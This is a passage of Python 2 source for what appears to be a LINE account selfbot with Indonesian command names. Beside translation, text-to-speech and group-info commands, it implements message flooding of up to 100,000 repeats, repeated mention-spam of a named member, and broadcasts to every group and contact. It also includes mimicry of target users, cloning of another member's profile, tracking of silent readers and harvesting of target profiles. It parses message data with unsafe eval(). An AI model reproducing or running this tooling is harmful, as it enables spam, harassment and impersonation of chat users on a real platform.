kr.sendMessage(M)
kr.sendText(msg.to,"Creator Grup")
elif msg.text.lower() == 'invite:gcreator':
if msg.toType == 2:
ginfo = kr.getGroup(msg.to)
try:
gcmid = ginfo.creator.mid
except:
gcmid = "Error"
if wait["lang"] == "JP":
kr.inviteIntoGroup(msg.to,[gcmid])
else:
kr.inviteIntoGroup(msg.to,[gcmid])
elif ("Gname: " in msg.text):
if msg.toType == 2:
X = kr.getGroup(msg.to)
X.name = msg.text.replace("Gname: ","")
kr.updateGroup(X)
elif msg.text.lower() == 'infogrup':
group = kr.getGroup(msg.to)
try:
gCreator = group.creator.displayName
except:
gCreator = "Error"
md = "[Nama Grup : ]\n" + group.name + "\n\n[Id Grup : ]\n" + group.id + "\n\n[Pembuat Grup :]\n" + gCreator + "\n\n[Gambar Grup : ]\nhttp://dl.profile.line-cdn.net/" + group.pictureStatus
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
kr.sendText(msg.to,md)
elif msg.text.lower() == 'grup id':
gid = kr.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (kr.getGroup(i).name,i)
kr.sendText(msg.to,h)
#==============================================================================#
elif msg.text in ["Glist"]:
gid = kr.getGroupIdsJoined()
h = ""
for i in gid:
h += "%s\n" % (kr.getGroup(i).name +" ? ["+str(len(kr.getGroup(i).members))+"]")
kr.sendText(msg.to,"-- List Groups --\n\n"+ h +"\nTotal groups =" +" ["+str(len(gid))+"]")
elif msg.text.lower() == 'gcancel':
gid = kr.getGroupIdsInvited()
for i in gid:
kr.rejectGroupInvitation(i)
if wait["lang"] == "JP":
kr.sendText(msg.to,"Aku menolak semua undangan")
else:
kr.sendText(msg.to,"He declined all invitations")
elif "Auto add" in msg.text:
thisgroup = kr.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
kr.findAndAddContactsByMids(mi_d)
kr.sendText(msg.to,"Success Add all")
elif "@bye" in msg.text:
if msg.toType == 2:
ginfo = kr.getGroup(msg.to)
try:
kr.leaveGroup(msg.to)
except:
pass
#==============================================================================#
elif "Sun" == msg.text.lower():
group = kr.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
summon(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 99):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, len(nama)-1):
nm2 += [nama[j]]
summon(msg.to, nm2)
if jml > 200 and jml < 500:
for i in range(0, 99):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, 199):
nm2 += [nama[j]]
summon(msg.to, nm2)
for k in range(200, 299):
nm3 += [nama[k]]
summon(msg.to, nm3)
for l in range(300, 399):
nm4 += [nama[l]]
summon(msg.to, nm4)
for m in range(400, len(nama)-1):
nm5 += [nama[m]]
summon(msg.to, nm5)
if jml > 500:
print "Terlalu Banyak Men 500+"
cnt = Message()
cnt.text = "Jumlah:\n" + str(jml) + " Members"
cnt.to = msg.to
kr.sendMessage(cnt)
elif "Sider on" == msg.text.lower():
if msg.to in wait2['readPoint']:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
kr.sendText(msg.to,"Setpoint already on")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
kr.sendText(msg.to, "Set reading point:\n" + datetime.now().strftime('%H:%M:%S'))
print wait2
elif "Sider off" == msg.text.lower():
if msg.to not in wait2['readPoint']:
kr.sendText(msg.to,"Setpoint already off")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
kr.sendText(msg.to, "Delete reading point:\n" + datetime.now().strftime('%H:%M:%S'))
elif msg.text in ["Ciduk","Nahloh"]:
if msg.toType == 2:
print "\nRead aktif..."
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
kr.sendText(msg.to, "╔═════════════ \n╠Sider :\n╠═════════════ %s\n╠\n╠═════════════\n╠Reader :\n╠═════════════ %s\n╠\n╠═════════════\n╠In the last seen point:\n╠[%s]\n╚═════════════" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
print "\nReading Point Set..."
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print "Ciduk ready"
kr.sendText(msg.to, "Auto Read Point!!" + (wait2['setTime'][msg.to]))
else:
kr.sendText(msg.to, "Ketik [Cctv on] dulu, baru ketik [Toong]")
elif "intip" == msg.text.lower():
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
kr.sendText(msg.to, "Reader:\nNone")
else:
chiya = []
for rom in wait2["ROM"][msg.to].items():
chiya.append(rom[1])
cmem = kr.getContacts(chiya)
zx = ""
zxc = ""
zx2 = []
xpesan = ''
for x in range(len(cmem)):
xname = str(cmem[x].displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':cmem[x].mid}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
print zxc
msg.text = xpesan+ zxc + "\nBefore: %s\nAfter: %s"%(wait2['setTime'][msg.to],datetime.now().strftime('%H:%M:%S'))
lol ={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
print lol
msg.contentMetadata = lol
try:
kr.sendMessage(msg)
except Exception as error:
print error
pass
else:
kr.sendText(msg.to, "Lurking has not been set.")
elif "Gbroadcast: " in msg.text:
bc = msg.text.replace("Gbroadcast: ","")
gid = kr.getGroupIdsJoined()
for i in gid:
kr.sendText(i, bc)
elif "Cbroadcast: " in msg.text:
bc = msg.text.replace("Cbroadcast: ","")
gid = kr.getAllContactIds()
for i in gid:
kr.sendText(i, bc)
elif "Spam change: " in msg.text:
wait["spam"] = msg.text.replace("Spam change: ","")
kr.sendText(msg.to,"spam changed")
elif "Spam add: " in msg.text:
wait["spam"] = msg.text.replace("Spam add: ","")
if wait["lang"] == "JP":
kr.sendText(msg.to,"spam changed")
else:
kr.sendText(msg.to,"Done")
elif "Spam: " in msg.text:
strnum = msg.text.replace("Spam: ","")
num = int(strnum)
for var in range(0,num):
kr.sendText(msg.to, wait["spam"])
elif "Spamtag @" in msg.text:
_name = msg.text.replace("Spamtag @","")
_nametarget = _name.rstrip(' ')
gs = kr.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
xname = g.displayName
xlen = str(len(xname)+1)
msg.contentType = 0
msg.text = "@"+xname+" "
msg.contentMetadata ={'MENTION':'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(g.mid)+'}]}','EMTVER':'4'}
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
kr.sendMessage(msg)
else:
pass
elif "Spam" in msg.text:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","")
tulisan = jmlh * (teks+"\n")
if txt[1] == "on":
if jmlh <= 100000:
for x in range(jmlh):
kr.sendText(msg.to, teks)
else:
kr.sendText(msg.to, "Out of Range!")
elif txt[1] == "off":
if jmlh <= 100000:
kr.sendText(msg.to, tulisan)
else:
kr.sendText(msg.to, "Out Of Range!")
elif ("Micadd " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
mimic["target"][target] = True
kr.sendText(msg.to,"Target ditambahkan!")
break
except:
kr.sendText(msg.to,"Fail !")
break
elif ("Micdel " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del mimic["target"][target]
kr.sendText(msg.to,"Target dihapuskan!")
break
except:
kr.sendText(msg.to,"Fail !")
break
elif msg.text in ["Miclist"]:
if mimic["target"] == {}:
kr.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in mimic["target"]:
mc += "?? "+kr.getContact(mi_d).displayName + "\n"
kr.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if mimic["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
mimic["copy2"] = "me"
kr.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
mimic["copy2"] = "target"
kr.sendText(msg.to,"Mimic change to target")
else:
kr.sendText(msg.to,"I dont know")
elif "Mimic " in msg.text:
cmd = msg.text.replace("Mimic ","")
if cmd == "on":
if mimic["status"] == False:
mimic["status"] = True
kr.sendText(msg.to,"Reply Message on")
else:
kr.sendText(msg.to,"Sudah on")
elif cmd == "off":
if mimic["status"] == True:
mimic["status"] = False
kr.sendText(msg.to,"Reply Message off")
else:
kr.sendText(msg.to,"Sudah off")
elif "Setimage: " in msg.text:
wait["pap"] = msg.text.replace("Setimage: ","")
kr.sendText(msg.to, "Pap telah di Set")
elif msg.text in ["Papimage","Papim","Pap"]:
kr.sendImageWithURL(msg.to,wait["pap"])
elif "Setvideo: " in msg.text:
wait["pap"] = msg.text.replace("Setvideo: ","")
kr.sendText(msg.to,"Video Has Ben Set To")
elif msg.text in ["Papvideo","Papvid"]:
kr.sendVideoWithURL(msg.to,wait["pap"])
elif "TL:" in msg.text:
if msg.toType == 2:
tl_text = msg.text.replace("TL:","")
kr.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+kr.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
#==============================================================================#
elif msg.text.lower() == 'mymid':
kr.sendText(msg.to,mid)
elif "Timeline: " in msg.text:
tl_text = msg.text.replace("Timeline: ","")
kr.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+kr.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif "Myname: " in msg.text:
string = msg.text.replace("Myname: ","")
if len(string.decode('utf-8')) <= 10000000000:
profile = kr.getProfile()
profile.displayName = string
kr.updateProfile(profile)
kr.sendText(msg.to,"Changed " + string + "")
elif "Mybio: " in msg.text:
string = msg.text.replace("Mybio: ","")
if len(string.decode('utf-8')) <= 10000000000:
profile = kr.getProfile()
profile.statusMessage = string
kr.updateProfile(profile)
kr.sendText(msg.to,"Changed " + string)
elif msg.text in ["Myname"]:
h = kr.getContact(mid)
kr.sendText(msg.to,"===[DisplayName]===\n" + h.displayName)
elif msg.text in ["Mybio"]:
h = kr.getContact(mid)
kr.sendText(msg.to,"===[StatusMessage]===\n" + h.statusMessage)
elif msg.text in ["Mypict"]:
h = kr.getContact(mid)
kr.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Myvid"]:
h = kr.getContact(mid)
kr.sendVideoWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Urlpict"]:
h = kr.getContact(mid)
kr.sendText(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Mycover"]:
h = kr.getContact(mid)
cu = kr.channel.getCover(mid)
path = str(cu)
kr.sendImageWithURL(msg.to, path)
elif msg.text in ["Urlcover"]:
h = kr.getContact(mid)
cu = kr.channel.getCover(mid)
path = str(cu)
kr.sendText(msg.to, path)
elif "Getmid @" in msg.text:
_name = msg.text.replace("Getmid @","")
_nametarget = _name.rstrip(' ')
gs = kr.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
kr.sendText(msg.to, g.mid)
else:
pass
elif "Getinfo" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = kr.getContact(key1)
cu = kr.channel.getCover(key1)
try:
kr.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\nHeader :\n" + str(cu))
except:
kr.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\n" + str(cu))
elif "Getbio" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = kr.getContact(key1)
cu = kr.channel.getCover(key1)
try:
kr.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
except:
kr.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
elif "Getname" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = kr.getContact(key1)
cu = kr.channel.getCover(key1)
try:
kr.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
except:
kr.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
elif "Getprofile" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = kr.getContact(key1)
cu = kr.channel.getCover(key1)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
kr.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
kr.sendText(msg.to,"Profile Picture " + contact.displayName)
kr.sendImageWithURL(msg.to,image)
kr.sendText(msg.to,"Cover " + contact.displayName)
kr.sendImageWithURL(msg.to,path)
except:
pass
elif "Getcontact" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = kr.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
kr.sendMessage(msg)
elif "Getpict @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getpict @","")
_nametarget = _name.rstrip(' ')
gs = kr.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kr.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = kr.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
kr.sendImageWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Getvid @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getvid @","")
_nametarget = _name.rstrip(' ')
gs = kr.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kr.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = kr.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
kr.sendVideoWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Picturl @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Picturl @","")
_nametarget = _name.rstrip(' ')
gs = kr.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kr.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = kr.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
kr.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Getcover @" in msg.text:
print "[Command]cover executing"
_name = msg.text.replace("Getcover @","")
_nametarget = _name.rstrip(' ')
gs = kr.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kr.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = kr.getContact(target)
cu = kr.channel.getCover(target)
path = str(cu)
kr.sendImageWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
elif "Coverurl @" in msg.text:
print "[Command]cover executing"
_name = msg.text.replace("Coverurl @","")
_nametarget = _name.rstrip(' ')
gs = kr.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kr.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = kr.getContact(target)
cu = kr.channel.getCover(target)
path = str(cu)
kr.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
elif "Getgrup image" in msg.text:
group = kr.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
kr.sendImageWithURL(msg.to,path)
elif "Urlgrup image" in msg.text:
group = kr.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
kr.sendText(msg.to,path)
elif "Mycopy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("Mycopy @","")
_nametarget = _name.rstrip(' ')
gs = kr.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kr.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
kr.CloneContactProfile(target)
kr.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif msg.text in ["Mybackup","mybackup"]:
try:
kr.updateDisplayPicture(backup.pictureStatus)
kr.updateProfile(backup)
kr.sendText(msg.to, "Refreshed.")
except Exception as e:
kr.sendText(msg.to, str(e))
#==============================================================================#
elif "Fancytext: " in msg.text:
txt = msg.text.replace("Fancytext: ", "")
kr.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif "Translate-id " in msg.text:
isi = msg.text.replace("Tr-id ","")
translator = Translator()
hasil = translator.translate(isi, dest='id')
A = hasil.text
A = A.encode('utf-8')
kr.sendText(msg.to, A)
elif "Translate-en " in msg.text:
isi = msg.text.replace("Tr-en ","")
translator = Translator()
hasil = translator.translate(isi, dest='en')
A = hasil.text
A = A.encode('utf-8')
kr.sendText(msg.to, A)
elif "Translate-ar" in msg.text:
isi = msg.text.replace("Tr-ar ","")
translator = Translator()
hasil = translator.translate(isi, dest='ar')
A = hasil.text
A = A.encode('utf-8')
kr.sendText(msg.to, A)
elif "Translate-jp" in msg.text:
isi = msg.text.replace("Tr-jp ","")
translator = Translator()
hasil = translator.translate(isi, dest='ja')
A = hasil.text
A = A.encode('utf-8')
kr.sendText(msg.to, A)
elif "Translate-ko" in msg.text:
isi = msg.text.replace("Tr-ko ","")
translator = Translator()
hasil = translator.translate(isi, dest='ko')
A = hasil.text
A = A.encode('utf-8')
kr.sendText(msg.to, A)
elif "Id@en" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'en'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr.sendText(msg.to,"**FROM ID**\n" + "" + kata + "\n**TO ENGLISH**\n" + "" + result + "\n**SUKSES**")
elif "En@id" in msg.text:
bahasa_awal = 'en'
bahasa_tujuan = 'id'
kata = msg.text.replace("En@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr.sendText(msg.to,"**FROM EN**\n" + "" + kata + "\n**TO ID**\n" + "" + result + "\n**SUKSES**")
elif "Id@jp" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ja'
kata = msg.text.replace("Id@jp ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr.sendText(msg.to,"**FROM ID**\n" + "" + kata + "\n**TO JP**\n" + "" + result + "\n**SUKSES**")
elif "Jp@id" in msg.text:
bahasa_awal = 'ja'
bahasa_tujuan = 'id'
kata = msg.text.replace("Jp@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr.sendText(msg.to,"----FROM JP----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@th" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'th'
kata = msg.text.replace("Id@th ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO TH----\n" + "" + result + "\n------SUKSES-----")
elif "Th@id" in msg.text:
bahasa_awal = 'th'
bahasa_tujuan = 'id'
kata = msg.text.replace("Th@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr.sendText(msg.to,"----FROM TH----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@jp" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ja'
kata = msg.text.replace("Id@jp ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO JP----\n" + "" + result + "\n------SUKSES-----")
elif "Id@ar" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ar'
kata = msg.text.replace("Id@ar ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO AR----\n" + "" + result + "\n------SUKSES-----")
elif "Ar@id" in msg.text:
bahasa_awal = 'ar'
bahasa_tujuan = 'id'
kata = msg.text.replace("Ar@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr.sendText(msg.to,"----FROM AR----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@ko" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ko'
kata = msg.text.replace("Id@ko ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO KO----\n" + "" + result + "\n------SUKSES-----")
elif "Ko@id" in msg.text:
bahasa_awal = 'ko'
bahasa_tujuan = 'id'
kata = msg.text.replace("Ko@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr.sendText(msg.to,"----FROM KO----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif msg.text.lower() == 'welcome':
ginfo = kr.getGroup(msg.to)
kr.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
jawaban1 = ("Selamat Datang Di Grup " + str(ginfo.name))
kr.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
tts = gTTS(text=jawaban1, lang='id')
tts.save('tts.mp3')
kr.sendAudio(msg.to,'tts.mp3')
elif "Say-id " in msg.text:
say = msg.text.replace("Say-id ","")
lang = 'id'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
kr.sendAudio(msg.to,"hasil.mp3")
elif "Say-en " in msg.text:
say = msg.text.replace("Say-en ","")
lang = 'en'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
kr.sendAudio(msg.to,"hasil.mp3")
elif "Say-jp " in msg.text:
say = msg.text.replace("Say-jp ","")
lang = 'ja'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
kr.sendAudio(msg.to,"hasil.mp3")
elif "Say-ar " in msg.text:
say = msg.text.replace("Say-ar ","")
lang = 'ar'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
kr.sendAudio(msg.to,"hasil.mp3")
elif "Say-ko " in msg.text:
say = msg.text.replace("Say-ko ","")
lang = 'ko'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
kr.sendAudio(msg.to,"hasil.mp3")
elif "Kapan " in msg.text:
tanya = msg.text.replace("Kapan ","")
jawab = ("kapan kapan","besok","satu abad lagi","Hari ini","Tahun depan","Minggu depan","Bulan depan","Sebentar lagi")
jawaban = random.choice(jawab)
tts = gTTS(text=jawaban, lang='id')
tts.save('tts.mp3')
kr.sendAudio(msg.to,'tts.mp3')
elif "Apakah " in msg.text:
tanya = msg.text.replace("Apakah ","")
jawab = ("Ya","Tidak","Mungkin","Bisa jadi")
jawaban = random.choice(jawab)
tts = gTTS(text=jawaban, lang='id')
tts.save('tts.mp3')
kr.sendAudio(msg.to,'tts.mp3')
elif 'Youtubemp4 ' in msg.text:
try:
textToSearch = (msg.text).replace('Youtubemp4 ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class': 'yt-uix-tile-link'})
ght = ('https://www.youtube.com' + results['href'])
kr.sendVideoWithURL(msg.to, ght)
except:
kr.sendText(msg.to, "Could not find it")
elif "Youtubesearch " in msg.text:
query = msg.text.replace("Youtube ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
hasil = ""
for a in soup.select('.yt-lockup-title > a[title]'):
